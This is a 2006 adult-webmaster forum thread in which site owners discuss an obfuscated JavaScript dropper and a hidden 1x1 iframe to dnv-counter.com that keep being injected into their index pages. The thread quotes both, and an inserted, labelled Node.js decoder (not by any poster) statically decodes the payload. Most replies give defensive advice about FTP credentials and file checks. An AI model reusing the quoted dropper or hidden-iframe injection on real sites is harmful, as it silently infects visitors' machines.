Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums.

Old 07-06-2006, 10:45 AM   #1
maxxxxx
Confirmed User
 
Join Date: Jul 2003
Posts: 646
Virus alert on new sologirl site

Checked out a new sologirl site which gave me a virus alert: "signature of js/shellcode virus found" which seems to be some kind of trojan. Contacted the owner who said that he wasn't aware of any javascript on his site. However, this piece of javascript was removed from his site minutes after I had contacted him:

<script language="JavaScript">
e = '0x00' + '29';str1 = "%92%CA%C1%DC%B6%DB%DA%D1%C2%CD%95%88%DC%C1%DB%C1% C8%C1%C2%C1%DA%D1%90%CE%C1%CA%CA%CD%C4%88%94%92%C1 %CC%D8%C9%C5%CD%B6%DB%D8%CB%95%88%CE%DA%DA%C6%90%8 7%87%CA%C4%DC%85%CB%C7%DD%C4%DA%CD%D8%84%CB%C7%C5% 87%CA%C4%DC%9B%87%88%B6%DF%C1%CA%DA%CE%95%99%B6%CE %CD%C1%CF%CE%DA%95%99%94%92%87%C1%CC%D8%C9%C5%CD%9 4%92%87%CA%C1%DC%94%B6%A5%A0";str=tmp='';for(i=0;i <str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCha rCode((tmp.charCodeAt(0)^e)-127);}document.write(str);
</script>

Can anyone do something with this? Any idea what this js/shellcode virus is? Just trying to find out what's going on.
__________________


****Teen Harbour**** - Home of Little Caprice
-------------------------------------------------------------------
In a perfect world... spammers would get caught, go to jail, and share a cell with many men who have enlarged their penisses, taken Viagra and are looking for a new relationship.

Last edited by maxxxxx; 07-06-2006 at 10:46 AM..
Old 07-06-2006, 10:46 AM   #2
Huskie
Confirmed User
 
Join Date: Apr 2006
Posts: 182
That's shitty
Old 07-06-2006, 10:57 AM   #3
Quickdraw
Confirmed User
 
Join Date: Mar 2004
Location: → → →
Posts: 1,717
Another one that belongs to dnv-counter--
<div style="visibilitydden"><i frame src="ht://dnv- counter.com/dnv3/" width=1 height=1></iframe></div>
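Added example, not written by any poster in this thread: a static decode of the obfuscated script from post #1 in JavaScript (Node.js), which recovers the markup the script would pass to document.write without running it; the result is the hidden 1x1 iframe quoted in post #3. The function names (decodeDropper, findFrames, defang, analyze) are made up for this example.

```javascript
// Added example: static decoder for the obfuscated script quoted in post #1.
// Nothing here calls eval or document.write; every function only returns data.

// Payload as it appears in post #1, including the spaces the forum inserted
// when wrapping the long string (decodeDropper strips them).
const PAYLOAD =
  "%92%CA%C1%DC%B6%DB%DA%D1%C2%CD%95%88%DC%C1%DB%C1% " +
  "C8%C1%C2%C1%DA%D1%90%CE%C1%CA%CA%CD%C4%88%94%92%C1 " +
  "%CC%D8%C9%C5%CD%B6%DB%D8%CB%95%88%CE%DA%DA%C6%90%8 " +
  "7%87%CA%C4%DC%85%CB%C7%DD%C4%DA%CD%D8%84%CB%C7%C5% " +
  "87%CA%C4%DC%9B%87%88%B6%DF%C1%CA%DA%CE%95%99%B6%CE " +
  "%CD%C1%CF%CE%DA%95%99%94%92%87%C1%CC%D8%C9%C5%CD%9 " +
  "4%92%87%CA%C1%DC%94%B6%A5%A0";

// The script sets e = '0x00' + '29', i.e. the string "0x0029", which the ^
// operator coerces to 41. Each %XX byte becomes (byte ^ 41) - 127.
function decodeDropper(encoded, xorKey = 0x29, offset = 127) {
  const clean = encoded.replace(/\s+/g, "");
  if (!/^(?:%[0-9A-Fa-f]{2})+$/.test(clean)) {
    throw new Error("payload is not a pure %XX sequence");
  }
  let out = "";
  for (let i = 0; i < clean.length; i += 3) {
    const byte = parseInt(clean.slice(i + 1, i + 3), 16);
    out += String.fromCharCode((byte ^ xorKey) - offset);
  }
  return out;
}

// Heuristic triage of the decoded markup: list iframes and flag the ones
// that are 1x1 or sit after a visibility:hidden / display:none style.
function findFrames(html) {
  const frames = [];
  const tagRe = /<iframe\b([^>]*)>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const attr = (name) => {
      const re = new RegExp(
        "\\b" + name + "\\s*=\\s*(?:\"([^\"]*)\"|'([^']*)'|([^\\s>]+))", "i");
      const a = re.exec(m[1]);
      return a ? a[1] || a[2] || a[3] || "" : null;
    };
    const w = attr("width");
    const h = attr("height");
    frames.push({
      src: attr("src"),
      tiny: w !== null && h !== null && Number(w) <= 1 && Number(h) <= 1,
      hiddenWrapper: /visibility\s*:\s*hidden|display\s*:\s*none/i
        .test(html.slice(0, m.index)),
    });
  }
  return frames;
}

// Rewrite a URL so it cannot be clicked or auto-linked in a report.
function defang(url) {
  return url.replace(/^http/i, "hxxp").replace(/\./g, "[.]");
}

// Decode, triage, and return report rows with defanged sources.
function analyze(encoded) {
  return findFrames(decodeDropper(encoded)).map((f) => ({
    ...f,
    src: f.src === null ? null : defang(f.src),
  }));
}

console.log(analyze(PAYLOAD));
```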
Old 07-06-2006, 10:59 AM   #4
maxxxxx
Confirmed User
 
Join Date: Jul 2003
Posts: 646
Thanks - any problems with that? Or was the virus alert something else?
Old 07-06-2006, 11:05 AM   #5
Quickdraw
Confirmed User
 
Join Date: Mar 2004
Location: → → →
Posts: 1,717
oh yeah, it's trouble for sure. There are a lot of threads about this. Hacking 'open' scripts and inserting the code(s) into templates, etc..
Old 07-06-2006, 11:07 AM   #6
Shoehorn!
Die With Your Boots On
 
Join Date: Oct 2003
Location: Hawaii
Posts: 22,872
What site did you find that on?
Old 07-06-2006, 11:31 AM   #7
maxxxxx
Confirmed User
 
Join Date: Jul 2003
Posts: 646
Quote:
Originally Posted by Shoehorn!
What site did you find that on?
I'll leave the site out. It's gone now, so I can't prove that it was ever there anyway.
Old 07-06-2006, 11:34 AM   #8
maxxxxx
Confirmed User
 
Join Date: Jul 2003
Posts: 646
Quote:
Originally Posted by Quickdraw
oh yeah, it's trouble for sure. There are a lot of threads about this. Hacking 'open' scripts and inserting the code(s) into templates, etc..
Quickdraw, you are the expert - can you point me to any of those threads or other reading stuff about it? Much appreciated - thanks!
Old 07-06-2006, 11:42 AM   #9
PornAddict
Confirmed User
 
Join Date: Feb 2002
Location: New Jersey
Posts: 1,401
I've had that script installed on a couple of my sites and have been trying to track down how it's getting done.

The only active scripts I have installed on my server are those from NATS, CCbill and PayCom. I've contacted each, along with my host and no one can point me to what's happening.

Anyone got any info?

- PornAddict
Old 07-06-2006, 11:52 AM   #10
maxxxxx
Confirmed User
 
Join Date: Jul 2003
Posts: 646
Quote:
Originally Posted by PornAddict
I've had that script installed on a couple of my sites and have been trying to track down how it's getting done.

The only active scripts I have installed on my server are those from NATS, CCbill and PayCom. I've contacted each, along with my host and no one can point me to what's happening.

Anyone got any info?

- PornAddict
You mean it got added to your sites from outside? Server hacked? Wow...
Old 07-06-2006, 11:56 AM   #11
Quickdraw
Confirmed User
 
Join Date: Mar 2004
Location: → → →
Posts: 1,717
http://www.google.com/search?hl=en&l...dnv-counter%22

As GFY search is just about worthless, this google link is the best I can do.

Yes, I believe for the most part, that these scripts are part of a hack and not the webmaster doing it on purpose. There are several webmasters on this board that have been hit.

There was a poster the other day that had a bit of info on this company, but I don't remember the username, or the post.. so maybe the bump will let them find you
Old 07-06-2006, 11:58 AM   #12
djroof
JuicyDevils.gr Owner
 
Join Date: Jan 2004
Location: Greece
Posts: 25,415
I have the same on my site juicydevils.com yes this is huge shitty... u delete it and after time is there again...
Old 07-06-2006, 11:58 AM   #13
PornAddict
Confirmed User
 
Join Date: Feb 2002
Location: New Jersey
Posts: 1,401
Quote:
Originally Posted by maxxxxx
You mean it got added to your sites from outside? Server hacked? Wow...
That's exactly what I'm talking about!

It just seems like the script is added every once in a while. So far, 3 times in the past 2 months I've found it on the same 2-3 sites and no one can seem to find the problem. I always get the standard, "it's not us... it must be someone else's scripts" reply.

I wish there were something more I can do but I'm screwed at the moment.

- PornAddict
Old 07-06-2006, 11:59 AM   #14
Quickdraw
Confirmed User
 
Join Date: Mar 2004
Location: → → →
Posts: 1,717
Quote:
Originally Posted by djroof
I have the same on my site juicydevils.com yes this is huge shitty... u delete it and after time is there again...
Check your scripts' template files, if you have any.
Old 07-06-2006, 12:10 PM   #15
PornAddict
Confirmed User
 
Join Date: Feb 2002
Location: New Jersey
Posts: 1,401
Quote:
Originally Posted by Quickdraw
Check your scripts' template files, if you have any.
Oh... another thing to point out is that they only seem to show up on the index files, no tour or join pages. The index files aren't templates, either... they're done manually and uploaded via ftp. So somehow, they can add this bit of code into my pages once they're uploaded.

- PornAddict
Old 07-06-2006, 12:20 PM   #16
V_RocKs
Damn Right I Kiss Ass!
 
Join Date: Dec 2003
Location: Cowtown, USA
Posts: 32,421
Quote:
Originally Posted by PornAddict
Oh... another thing to point out is that they only seem to show up on the index files, no tour or join pages. The index files aren't templates, either... they're done manually and uploaded via ftp. So somehow, they can add this bit of code into my pages once they're uploaded.

- PornAddict
Usually they upload their own httpd... then run it... so it is added to the index file on the fly... the code won't actually be in the index file.
Old 07-06-2006, 12:26 PM   #17
Ray@TastyDollars
 
Join Date: May 2002
Location: Montreal
Posts: 6,797
We had that code on two of our TGP's. ICQ me if you want details, 161 375 873

thx,
Ray
Old 07-06-2006, 12:27 PM   #18
frank7799
Confirmed User
 
Join Date: Jul 2003
Location: In the middle of nowhere...
Posts: 1,974
Had the same problem some days ago and discussed it on another board. I remember that the same script problem was brought to GFY because I posted in that thread.
Old 07-06-2006, 12:38 PM   #19
maxxxxx
Confirmed User
 
Join Date: Jul 2003
Posts: 646
Quote:
Originally Posted by PornAddict
That's exactly what I'm talking about!

It just seems like the script is added every once in a while. So far, 3 times in the past 2 months I've found it on the same 2-3 sites and no one can seem to find the problem. I always get the standard, "it's not us... it must be someone else's scripts" reply.

I wish there were something more I can do but I'm screwed at the moment.

- PornAddict
PornAddict, what did your hosting company say?
Old 07-06-2006, 12:41 PM   #20
maxxxxx
Confirmed User
 
Join Date: Jul 2003
Posts: 646
Found it:


http://www.gfy.com/showthread.php?t=...ighlight=virus
Old 07-06-2006, 12:48 PM   #21
PornAddict
Confirmed User
 
Join Date: Feb 2002
Location: New Jersey
Posts: 1,401
Quote:
Originally Posted by maxxxxx
PornAddict, what did your hosting company say?
When I contacted them, I told them that I think my server has been hacked and if they can look around to see what happened. I told them about how the javascript was being installed on certain files.

The tech did a search and said that there was no actual hack but to check my scripts. That was it... I don't know which scripts or anything. All I do know is that I currently only have 4 scripts running on that server (ccbill, paycom, pennywize and nats).

It seems like they keep attacking the same 3 sites. What's weird is that the sites that are targeted are ones that were set up via paycom. I then contacted paycom because I remembered seeing a post on here about paycom's info being compromised and their scripts left open. It seemed like the case was cracked. I had paycom check around and nothing in their end (on my server) seemed to be modified, but they uploaded a fresh script regardless just to see. It has then happened again.

So, that's kinda where I am now. Still searching for an answer and a solution on how to prevent this from happening.

I don't know what the script does, but I know my mcafee picks it up and deletes it immediately... however, I don't know what it's doing to those without virus protection.

The way I normally catch it is when I ftp, I see the dates on which certain files were modified. There's no reason to ever update my index file (since it's just a standard warning / entrance page) so when I see newer dates, I know something is up.

- PornAddict
Old 07-06-2006, 01:00 PM   #22
frank7799
Confirmed User
 
Join Date: Jul 2003
Location: In the middle of nowhere...
Posts: 1,974
I had the hosting company looking for attacks, too. They didn't find any. I don't run scripts except a tgp script, but that site wasn't involved in the attack.

The only way to get it on my server was using ftp, I think. So I changed logins and passwords and limited ftp to a single account. Until now I didn't get the script again.
Old 07-06-2006, 01:01 PM   #23
E$_manager
Too lazy to set a custom title
 
Join Date: Apr 2006
Location: pink adult dreams
Posts: 13,557
that is so nasty!
Old 07-06-2006, 01:04 PM   #24
CaptainHowdy
Too lazy to set a custom title
 
Join Date: Dec 2004
Location: Happy in the dark.
Posts: 93,648
Fuckers !!
Old 07-06-2006, 01:06 PM   #25
SmokeyTheBear
►SouthOfHeaven
 
Join Date: Jun 2004
Location: PlanetEarth MyBoardRank: GerbilMaster My-Penis-Size: extralarge MyWeapon: Computer
Posts: 28,609
there's quite a few different scripts being hit, one of the notable is wordpress, and once a site is compromised you might as well consider the whole server compromised.. if you are affected and your host can't do anything or won't, hit me up on icq.
__________________
hatisblack at yahoo.com
Old 07-06-2006, 01:09 PM   #26
DutchTeenCash
I like Dutch Girls
 
Join Date: Feb 2003
Location: dutchteencash.com
Posts: 21,684
yeah fucking js script had it too - hope you'll solve it soon
Old 07-06-2006, 01:15 PM   #27
maxxxxx
Confirmed User
 
Join Date: Jul 2003
Posts: 646
There's more on http://www.******************/index.php?showtopic=2559
Isn't it possible to take that dnv-counter.com domain out?
Old 07-06-2006, 04:02 PM   #28
V_RocKs
Damn Right I Kiss Ass!
 
Join Date: Dec 2003
Location: Cowtown, USA
Posts: 32,421
Quote:
Originally Posted by PornAddict
When I contacted them, I told them that I think my server has been hacked and if they can look around to see what happened. I told them about how the javascript was being installed on certain files.

The tech did a search and said that there was no actual hack but to check my scripts. That was it... I don't know which scripts or anything. All I do know is that I currently only have 4 scripts running on that server (ccbill, paycom, pennywize and nats).

It seems like they keep attacking the same 3 sites. What's weird is that the sites that are targeted are ones that were set up via paycom. I then contacted paycom because I remembered seeing a post on here about paycom's info being compromised and their scripts left open. It seemed like the case was cracked. I had paycom check around and nothing in their end (on my server) seemed to be modified, but they uploaded a fresh script regardless just to see. It has then happened again.

So, that's kinda where I am now. Still searching for an answer and a solution on how to prevent this from happening.

I don't know what the script does, but I know my mcafee picks it up and deletes it immediately... however, I don't know what it's doing to those without virus protection.

The way I normally catch it is when I ftp, I see the dates on which certain files were modified. There's no reason to ever update my index file (since it's just a standard warning / entrance page) so when I see newer dates, I know something is up.

- PornAddict
ICQ me and I can check it out for you. 1611-24816
Old 07-06-2006, 04:26 PM   #29
NastyNed
Confirmed User
 
Join Date: Feb 2005
Location: ICQ: 326073684 AIM: NastyNedsPics YM: n3media MSN: [email protected]
Posts: 119
First, I want to thank Maxxxxx for protecting my identity... it was on one of my sites that he found this shit. I talked to my host... and he didn't want to implicate anybody... but he said that when CC Bill's system was breached a while back (and no one's blaming CC Bill for any of this - it's the asshole hacks who perpetrated it), that this problem started occurring on about 95% of their sites... possibly from the fact that CC Bill has FTP access to all of our servers. This shit keeps coming back because the dickheads keep loading it onto your server every 2 or 3 weeks, or so. His recommendation was check your files on your local host... clean them out... and make a habit of uploading your clean files every day... and also...

...CHANGE YOUR FTP PASSWORD!!!

When you put up a new site with ANY webmerchant, change your/their password until you get through the approval process... once you get approved... change it back.

That should stop these pricks right in their tracks.
(until they figure out something new)

Make sense?
Last edited by NastyNed; 07-06-2006 at 04:27 PM..
Old 07-07-2006, 01:28 PM   #30
V_RocKs
Damn Right I Kiss Ass!
 
Join Date: Dec 2003
Location: Cowtown, USA
Posts: 32,421
Also install FTP on a non-standard port... They come in via scripts and it is all automated... Also, don't give your processor FTP access. Or allow them access on a separate account you created just for them and then disable it after the initial setup.
Old 07-07-2006, 02:00 PM   #31
chase
Confirmed User
 
Join Date: Jul 2004
Location: Tampa Bay
Posts: 6,019
Quote:
Originally Posted by SmokeyTheBear
there's quite a few different scripts being hit, one of the notable is wordpress, and once a site is compromised you might as well consider the whole server compromised.. if you are affected and your host can't do anything or won't, hit me up on icq.
what if your wordpress install is in a member's area?